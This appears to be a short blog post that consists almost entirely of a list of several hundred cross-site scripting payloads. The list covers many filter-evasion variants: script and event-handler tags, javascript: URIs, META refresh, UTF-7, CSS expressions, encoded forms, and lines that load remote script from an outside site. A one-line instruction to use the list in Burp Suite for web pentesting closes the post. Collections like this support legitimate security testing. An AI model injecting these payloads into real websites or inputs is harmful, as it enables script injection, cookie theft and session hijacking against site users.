payloads for xss

Some of payloads:


<iframe src=alert("1");</frame>
<img src=http://url onload=alert(0)//></img> 
"><script>alert("321");</script>
"><img src=x onerror=prompt("1");>
"--><img src=x onerror=open('cmd')>
\\\+ADw-script+AD4-alert(/xss/)+ADw-/script+AD4---//
1c91c<img%20src%3da%20onerror%3dalert(1) >cc245622da6
>"<iframe src=http://vulnerability-lab.com/>@gmail.com
>"<script>alert(document.cookie)</script><div style="1@gmail.com
>"<script>alert(document.cookie)</script>@gmail.com
<iframe src=http://vulnerability-lab.com/>@gmail.com
<script>alert(document.cookie)</script><div style="1@gmail.com
<script>alert(document.cookie)</script>@gmail.com
+49/>"<iframe src=http://vulnerability-lab.com>1337
"><iframe src='' onload=alert('mphone')>
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');">
<META HTTP-EQUIV="Link" Content="<http://vulnerability-lab.com/CrossSiteScripting.css>; REL=stylesheet">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-
<iframe src=http://vulnerability-lab.com>1337+1
>“<ScriPt>ALeRt("VlAb")</scriPt>
>"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe> 
<html><body>
<button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,110,103,6,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
om.Char.Code</button></body></html>
<IMG SRC="javascript:alert('CrossSiteScripting');">
<IMG SRC=javascript:alert('CrossSiteScripting')>
<IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')>
<IMG SRC=javascript:alert("CrossSiteScripting")>
<IMG SRC=`javascript:alert("RM'CrossSiteScripting'")`>
<IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav  ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x09;ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x0A;ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x0D;ascript:alert('CrossSiteScripting');">
<IMG SRC="  javascript:alert('CrossSiteScripting');">
<IMG SRC="javascript:alert('CrossSiteScripting')"
<IMG DYNSRC="javascript:alert('CrossSiteScripting')">
<IMG LOWSRC="javascript:alert('CrossSiteScripting')">
<IMG SRC='vbscript:msgbox("CrossSiteScripting")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<OBJECT TYPE="text/x-scriptlet" DATA="http://vulnerability-lab.com/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT><STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>
<STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE>
<STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>
<STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting
<STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>
<DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url( javascript:alert('CrossSiteScripting'))">
<DIV STYLE="width: expression(alert('CrossSiteScripting'));">
<LAYER SRC="http://vulnerability-lab.com/script.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');">
<LINK REL="stylesheet" HREF="http://vulnerability-lab.com/CrossSiteScripting.css">
<BODY BACKGROUND="javascript:alert('CrossSiteScripting')">
<BODY ONLOAD=alert('CrossSiteScripting')>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("CrossSiteScripting")>
<iframe src=http://vulnerability-lab.com/index.html <
<TABLE BACKGROUND="javascript:alert('CrossSiteScripting')">
<TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')">
<BGSOUND SRC="javascript:alert('CrossSiteScripting');">
<BR SIZE="&{alert('CrossSiteScripting')}">
<A HREF="http://server.com/">CrossSiteScripting</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A>
<A HREF="http://1113982867/">CrossSiteScripting</A>
<A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A>
<BASE HREF="javascript:alert('CrossSiteScripting');//">
\";alert('CrossSiteScripting');//
<INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');">
<CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);">
¼script¾alert(¢CrossSiteScripting¢)¼/script¾
<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert('CrossSiteScripting'))">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))">  exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");  CrossSiteScripting:ex&#x2F;*CrossSiteScripting*//*/*/pression(alert("CrossSiteScripting"))'>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('CrossSiteScripting');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:alert('CrossSiteScripting')"></B></I></XML>
<SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="CrossSiteScriptingtest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>alert("CrossSiteScripting")</SCRIPT>">
</BODY></HTML>
<SCRIPT SRC="http://vulnerability-lab.com/CrossSiteScripting.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?>
<IMG SRC="http://www.vulnerability-lab.com/file.php?variables=malicious">
Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser
%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
&#x3C;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x65;&#x73;&#x74;&#x2E;&#x64;&#x65;&#x3E;
&#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62
PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
<SCRIPT>document.cookie=true;</SCRIPT>
<IMG SRC="jav ascript:document.cookie=true;">
<IMG SRC="javascript:document.cookie=true;">
<IMG SRC=" javascript:document.cookie=true;">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
<SCRIPT>document.cookie=true;//<</SCRIPT>
<SCRIPT <B>document.cookie=true;</SCRIPT>
<IMG SRC="javascript:document.cookie=true;">
<iframe src="javascript:document.cookie=true;> 
<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> 
</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
<BODY BACKGROUND="javascript:document.cookie=true;">
<BODY ONLOAD=document.cookie=true;>
<IMG DYNSRC="javascript:document.cookie=true;">
<IMG LOWSRC="javascript:document.cookie=true;">
<BGSOUND SRC="javascript:document.cookie=true;">
<BR SIZE="&{document.cookie=true}">
<LAYER SRC="javascript:document.cookie=true;"></LAYER>
<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
¼script¾document.cookie=true;¼/script¾ 
<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
<TABLE BACKGROUND="javascript:document.cookie=true;">
<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
<DIV STYLE="background-image: url( javascript:document.cookie=true;)">
<DIV STYLE="width: expression(document.cookie=true);">
<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> 
exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> 
<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> 
<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> 
<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> 
<SCRIPT>document.cookie=true;</SCRIPT>
<BASE HREF="javascript:document.cookie=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.cookie=true;">
<div onmouseover="document.cookie=true;">
<img src="javascript:document.cookie=true;">
<img dynsrc="javascript:document.cookie=true;">
<input type="image" dynsrc="javascript:document.cookie=true;">
<bgsound src="javascript:document.cookie=true;">
&<script>document.cookie=true;</script> 
&{document.cookie=true;}; 
<img src=&{document.cookie=true;};> 
<link rel="stylesheet" href="javascript:document.cookie=true;"> 
<img src="mocha:document.cookie=true;"> 
<img src="livescript:document.cookie=true;"> 
<a href="about:<script>document.cookie=true;</script>"> 
<body onload="document.cookie=true;"> 
<div style="background-image: url(javascript:document.cookie=true;);"> 
<div style="behaviour: url([link to code]);"> 
<div style="binding: url([link to code]);"> 
<div style="width: expression(document.cookie=true;);">
<style type="text/javascript">document.cookie=true;</style>
<object classid="clsid:..." codebase="javascript:document.cookie=true;">
<style><!--</style><script>document.cookie=true;//--></script>
<<script>document.cookie=true;</script>
<script>document.cookie=true;//--></script>
<!-- -- --><script>document.cookie=true;</script><!-- -- -->
<img src="blah"onmouseover="document.cookie=true;">
<img src="blah>" onmouseover="document.cookie=true;">
<xml src="javascript:document.cookie=true;">
<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
>"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
>"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
>"<SCRIPT>document.cookie=true;</SCRIPT>
>"<IMG SRC="jav ascript:document.cookie=true;">
>"<IMG SRC="javascript:document.cookie=true;">
>"<IMG SRC=" javascript:document.cookie=true;">
>"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
>"<SCRIPT>document.cookie=true;//<</SCRIPT>
>"<SCRIPT <B>document.cookie=true;</SCRIPT>
>"<IMG SRC="javascript:document.cookie=true;">
>"<iframe src="javascript:document.cookie=true;> 
>"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> 
>"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
>"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
>"<BODY BACKGROUND="javascript:document.cookie=true;">
>"<BODY ONLOAD=document.cookie=true;>
>"<IMG DYNSRC="javascript:document.cookie=true;">
>"<IMG LOWSRC="javascript:document.cookie=true;">
>"<BGSOUND SRC="javascript:document.cookie=true;">
>"<BR SIZE="&{document.cookie=true}">
>"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
>"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
>"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
>"¼script¾document.cookie=true;¼/script¾ 
>"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
>"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
>"<TABLE BACKGROUND="javascript:document.cookie=true;">
>"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
>"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
>"<DIV STYLE="background-image: url( javascript:document.cookie=true;)">
>"<DIV STYLE="width: expression(document.cookie=true);">
>"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
>"<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
>"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> 
>"exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> 
>"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> 
>"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> 
>"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> 
>"<SCRIPT>document.cookie=true;</SCRIPT>
>"<BASE HREF="javascript:document.cookie=true;//">
>"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
>"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
>"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
>"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
>"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
>"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
>"<a href="javascript#document.cookie=true;">
>"<div onmouseover="document.cookie=true;">
>"<img src="javascript:document.cookie=true;">
>"<img dynsrc="javascript:document.cookie=true;">
>"<input type="image" dynsrc="javascript:document.cookie=true;">
>"<bgsound src="javascript:document.cookie=true;">
>"&<script>document.cookie=true;</script> 
>"&{document.cookie=true;}; 
>"<img src=&{document.cookie=true;};> 
>"<link rel="stylesheet" href="javascript:document.cookie=true;"> 
>"<img src="mocha:document.cookie=true;"> 
>"<img src="livescript:document.cookie=true;"> 
>"<a href="about:<script>document.cookie=true;</script>"> 
>"<body onload="document.cookie=true;"> 
>"<div style="background-image: url(javascript:document.cookie=true;);"> 
>"<div style="behaviour: url([link to code]);"> 
>"<div style="binding: url([link to code]);"> 
>"<div style="width: expression(document.cookie=true;);">
>"<style type="text/javascript">document.cookie=true;</style>
>"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
>"<style><!--</style><script>document.cookie=true;//--></script>
>"<<script>document.cookie=true;</script>
>"<script>document.cookie=true;//--></script>
>"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
>"<img src="blah"onmouseover="document.cookie=true;">
>"<img src="blah>" onmouseover="document.cookie=true;">
>"<xml src="javascript:document.cookie=true;">
>"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
>"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
-1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
-1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<IMG SRC="jav ascript:document.cookie=true;">
-1<IMG SRC="javascript:document.cookie=true;">
-1<IMG SRC=" javascript:document.cookie=true;">
-1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
-1<SCRIPT>document.cookie=true;//<</SCRIPT>
-1<SCRIPT <B>document.cookie=true;</SCRIPT>
-1<IMG SRC="javascript:document.cookie=true;">
-1<iframe src="javascript:document.cookie=true;> 
-1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> 
-1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
-1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
-1<BODY BACKGROUND="javascript:document.cookie=true;">
-1<BODY ONLOAD=document.cookie=true;>
-1<IMG DYNSRC="javascript:document.cookie=true;">
-1<IMG LOWSRC="javascript:document.cookie=true;">
-1<BGSOUND SRC="javascript:document.cookie=true;">
-1<BR SIZE="&{document.cookie=true}">
-1<LAYER SRC="javascript:document.cookie=true;"></LAYER>
-1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
-1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
-1¼script¾document.cookie=true;¼/script¾ 
-1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
-1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
-1<TABLE BACKGROUND="javascript:document.cookie=true;">
-1<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
-1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
-1<DIV STYLE="background-image: url( javascript:document.cookie=true;)">
-1<DIV STYLE="width: expression(document.cookie=true);">
-1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
-1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
-1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> 
-1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> 
-1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> 
-1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> 
-1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> 
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<BASE HREF="javascript:document.cookie=true;//">
-1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
-1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
-1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
-1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
-1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
-1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
-1<a href="javascript#document.cookie=true;">
-1<div onmouseover="document.cookie=true;">
-1<img src="javascript:document.cookie=true;">
-1<img dynsrc="javascript:document.cookie=true;">
-1<input type="image" dynsrc="javascript:document.cookie=true;">
-1<bgsound src="javascript:document.cookie=true;">
-1&<script>document.cookie=true;</script> 
-1&{document.cookie=true;}; 
-1<img src=&{document.cookie=true;};> 
-1<link rel="stylesheet" href="javascript:document.cookie=true;"> 
-1<img src="mocha:document.cookie=true;"> 
-1<img src="livescript:document.cookie=true;"> 
-1<a href="about:<script>document.cookie=true;</script>"> 
-1<body onload="document.cookie=true;"> 
-1<div style="background-image: url(javascript:document.cookie=true;);"> 
-1<div style="behaviour: url([link to code]);"> 
-1<div style="binding: url([link to code]);"> 
-1<div style="width: expression(document.cookie=true;);">
-1<style type="text/javascript">document.cookie=true;</style>
-1<object classid="clsid:..." codebase="javascript:document.cookie=true;">
-1<style><!--</style><script>document.cookie=true;//--></script>
-1<<script>document.cookie=true;</script>
-1<script>document.cookie=true;//--></script>
-1<!-- -- --><script>document.cookie=true;</script><!-- -- -->
-1<img src="blah"onmouseover="document.cookie=true;">
-1<img src="blah>" onmouseover="document.cookie=true;">
-1<xml src="javascript:document.cookie=true;">
-1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
-1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>







use these payloads  in burp suite and  pentest web application.

No comments: